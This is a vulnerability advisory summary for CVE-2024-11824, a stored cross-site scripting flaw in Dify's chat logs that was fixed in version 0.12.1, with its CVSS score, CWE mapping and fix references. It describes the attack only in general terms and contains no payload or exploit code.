CVE-2024-11824

CVE-2024-11824 is a stored cross-site scripting (XSS) vulnerability in the langgenius/dify application, specifically within its chat log functionality. The flaw affects the latest version prior to the patch and occurs because certain HTML tags, such as <input> and <form>, are not properly disallowed. This allows attackers to inject malicious HTML into chat logs via prompts. The vulnerability carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N) and maps to CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').

A low-privileged user (PR:L) can exploit the vulnerability by submitting prompts containing malicious HTML, which becomes stored in the chat log. When an administrator views the tainted log, the injected script executes in the admin's browser context due to insufficient sanitization, enabling the attacker to steal the admin's credentials or other sensitive information. Exploitation requires network access and user interaction from the victim (UI:R), but achieves high confidentiality impact with changed scope (S:C).

The issue is addressed in Dify version 0.12.1, with the fix implemented in commit 55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d available at https://github.com/langgenius/dify/commit/55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d. Security teams should prioritize upgrading to the patched version. Further details, including the original report, are provided in the Huntr bounty advisory at https://huntr.com/bounties/72387deb-6e64-48ed-a8c3-b50d22a0970f.